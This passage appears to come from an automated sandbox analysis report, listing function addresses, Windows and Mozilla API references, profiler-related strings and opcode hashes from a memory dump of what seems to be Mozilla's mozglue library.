                                                                                                                                                                                                                                                                                        • Instruction ID: 3811356ab819f1b3ffe9f2adc51f634ba9d3de3500a3231ddf272999c0292da3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3775574062bbb6ef012d05d7cde1baafa6f535e1a008d83b71a272ab001ac0e9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4851E172A097068FD764CF28C49061AB7E5EFAE704F24892FD59AC7B84D770E800CB91
                                                                                                                                                                                                                                                                                        Function 6C9B4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __aulldiv
                                                                                                                                                                                                                                                                                        • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                                                                                        • API String ID: 3732870572-2661126502
                                                                                                                                                                                                                                                                                        • Opcode ID: 213261594fa8c5d1224acf179fbd62d4096d76a789bdebf466780eedb0d67805
                                                                                                                                                                                                                                                                                        • Instruction ID: 13707dcf7659a4c0fed262672df32682d45a98fdb29045fd23dc09edd5f88b24
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 213261594fa8c5d1224acf179fbd62d4096d76a789bdebf466780eedb0d67805
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C414872A08708ABCB08DF78D85116FB7E5EF95744F14862DE85567B81EB30D844CB91
                                                                                                                                                                                                                                                                                        Function 6C9D9830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C9D985D
                                                                                                                                                                                                                                                                                        • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C9D987D
                                                                                                                                                                                                                                                                                        • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C9D98DE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C9D98D9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                                                                                                                                                                                                                        • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                                                                                                                                                                                                                        • API String ID: 1778083764-3290996778
                                                                                                                                                                                                                                                                                        • Opcode ID: 7abf87a9438c3945380e19f2441daddcd21cebbbc219343dd1e7148abb4540c9
                                                                                                                                                                                                                                                                                        • Instruction ID: 1dafb3f66ae6d314c8fb4f216a0e2256e7fac932ac9025a3793d71e07b950014
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7abf87a9438c3945380e19f2441daddcd21cebbbc219343dd1e7148abb4540c9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33313A71A002089FDB14AF58DC105EE77B9DF69718F10846DEA0AABB40CB31E904CBD1
                                                                                                                                                                                                                                                                                        Function 6C9B46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C9B4721
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C964410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C9A3EBD,00000017,?,00000000,?,6C9A3EBD,?,?,6C9642D2), ref: 6C964444
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                                                                                                                                                        • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                                                                                        • API String ID: 680628322-2661126502
                                                                                                                                                                                                                                                                                        • Opcode ID: 3e2091ab2ee48506b7e173e6807c25f9fbf93286213b150564e0762c02c5d648
                                                                                                                                                                                                                                                                                        • Instruction ID: 80762cc74343dcdfa33afdafba417fd7c612970d9ab57930f06ffdbfbf993f13
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e2091ab2ee48506b7e173e6807c25f9fbf93286213b150564e0762c02c5d648
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C313971F043086BCB08CF6DD8916AEBBE6DB99714F15853EE805ABB41EB74D804CB90
                                                                                                                                                                                                                                                                                        Function 6C9BB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C964290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9A3EBD,6C9A3EBD,00000000), ref: 6C9642A9
                                                                                                                                                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C9BB127), ref: 6C9BB463
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9BB4C9
                                                                                                                                                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C9BB4E4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                                                                                        • String ID: pid:
                                                                                                                                                                                                                                                                                        • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                                                                                        • Opcode ID: 6d8bfdee00752ec568ad9797f2bd4e25ca6ba81861aae19fad8f62f7669792d2
                                                                                                                                                                                                                                                                                        • Instruction ID: 19db4a872ff07b1402e37ccabb8dec66e602556d17b7e1336408d050cbfbac8d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d8bfdee00752ec568ad9797f2bd4e25ca6ba81861aae19fad8f62f7669792d2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D310031A01208EBDB10DFA9D880AEFF7BABF19318F540529D90577A81D771E849CBA1
                                                                                                                                                                                                                                                                                        Function 6C9AE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AE577
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AE584
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AE5DE
                                                                                                                                                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C9AE8A6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                                                                                                                                        • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                                                                                                                                        • API String ID: 1483687287-53385798
                                                                                                                                                                                                                                                                                        • Opcode ID: 3accf483f66443af3c4f630d38eddaf027c1bd309114fed34e19c0abf40bceca
                                                                                                                                                                                                                                                                                        • Instruction ID: 78658f2fab0ebc1ad77a058b98bde6b9157aa1217c24c5627b7282b1783d0f4e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3accf483f66443af3c4f630d38eddaf027c1bd309114fed34e19c0abf40bceca
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C117931A08358DFCB419F58D849B6ABBB8FFDD328F210A1AE84547A50E770E905CB95
                                                                                                                                                                                                                                                                                        Function 6C9B0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9B0CD5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C99F9A7
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9B0D40
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C9B0DCB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C985EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: memset.VCRUNTIME140(6C9C7765,000000E5,55CCCCCC), ref: 6C985F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: LeaveCriticalSection.KERNEL32(?), ref: 6C985FB2
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C9B0DDD
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C9B0DF2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4069420150-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 99123d56d1ce58f359ce935a0152bdad80f29a21dfd603066dfe01869a223463
                                                                                                                                                                                                                                                                                        • Instruction ID: 8b983bc99712cfc5140259470240842a5327803dd420c5100f7f6785ce15d0c3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99123d56d1ce58f359ce935a0152bdad80f29a21dfd603066dfe01869a223463
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 764123B1908784ABD320CF29C18039EFBE5BFD8614F119A2EE8D897750D770E444CB92
                                                                                                                                                                                                                                                                                        Function 6C9A0800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE7DC), ref: 6C9A0838
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C9A084C
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C9A08AF
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C9A08BD
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE7DC), ref: 6C9A08D5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$memset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 837921583-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 968a6438335ea0cc2a3ff124d58bdb870da9541ed59ef8f25afd0e41678e30f7
                                                                                                                                                                                                                                                                                        • Instruction ID: a813f7b15e1dcc3b9e544009029705fa8cd7c0232341bc12f2e24d0d48c589f0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 968a6438335ea0cc2a3ff124d58bdb870da9541ed59ef8f25afd0e41678e30f7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E21C831B052499BEF44CFA9D844BBE7379FF59708F600568D50AA7A41DF32E8058BD4
                                                                                                                                                                                                                                                                                        Function 6C9BCCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C9ADA31,00100000,?,?,00000000,?), ref: 6C9BCDA4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9BD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C9BCDBA,00100000,?,00000000,?,6C9ADA31,00100000,?,?,00000000,?), ref: 6C9BD158
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9BD130: InitializeConditionVariable.KERNEL32(00000098,?,6C9BCDBA,00100000,?,00000000,?,6C9ADA31,00100000,?,?,00000000,?), ref: 6C9BD177
                                                                                                                                                                                                                                                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C9ADA31,00100000,?,?,00000000,?), ref: 6C9BCDC4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B7480: ReleaseSRWLockExclusive.KERNEL32(?,6C9C15FC,?,?,?,?,6C9C15FC,?), ref: 6C9B74EB
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C9ADA31,00100000,?,?,00000000,?), ref: 6C9BCECC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: mozalloc_abort.MOZGLUE(?), ref: 6C97CAA2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9ACB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C9BCEEA,?,?,?,?,00000000,?,6C9ADA31,00100000,?,?,00000000), ref: 6C9ACB57
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9ACB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C9ACBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C9BCEEA,?,?), ref: 6C9ACBAF
                                                                                                                                                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C9ADA31,00100000,?,?,00000000,?), ref: 6C9BD058
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 861561044-0
                                                                                                                                                                                                                                                                                        • Opcode ID: df8cef1d09355a62d85274aa526c209b144e64842bce5385e02ffbdb903b887c
                                                                                                                                                                                                                                                                                        • Instruction ID: 31068285d1fd8b870da35445bbf181121e32ac465c003c5278f603cd2707d883
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df8cef1d09355a62d85274aa526c209b144e64842bce5385e02ffbdb903b887c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05D16071A04B069FD708CF28C4807AAF7E1BF99308F11866DD85997751EB31E965CB81
                                                                                                                                                                                                                                                                                        Function 6C971720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C9717B2
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C9718EE
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C971911
                                                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C97194C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3725304770-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 157cb656d656a33dfd614b44f11aa2c6ea8a4df44b64f29ac36a9c90bf840cfd
                                                                                                                                                                                                                                                                                        • Instruction ID: 0c86f08b6a7ee8f3111056b613edbc703d83cce0602e80c73182d795dd26bc6a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 157cb656d656a33dfd614b44f11aa2c6ea8a4df44b64f29ac36a9c90bf840cfd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9481DF70A162059FDB18CF68D8A49FEBBB1FF8A310F04456CE809AB754D730E945CBA1
                                                                                                                                                                                                                                                                                        Function 6C985C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6C985D40
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EF688), ref: 6C985D67
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C985DB4
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EF688), ref: 6C985DED
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 557828605-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 35ac45f7eb5519ca008ed872218e93c53c8c5dd14b324be03229c2c225659e3d
                                                                                                                                                                                                                                                                                        • Instruction ID: 3fe2f7f774e6951fc7d19af14216d5c8cc421bf6f0cee3203adabe93b306b5f8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35ac45f7eb5519ca008ed872218e93c53c8c5dd14b324be03229c2c225659e3d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56516172E051598FDF08CF68C854ABEBBB1FF99708F298A1ED811A7751C730A945CB90
                                                                                                                                                                                                                                                                                        Function 6C96CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C96CEBD
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C96CEF5
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C96CF4E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 6da283f7a76d8d5b919327a3786961eafe96866f6c0511171e570d5951cd4019
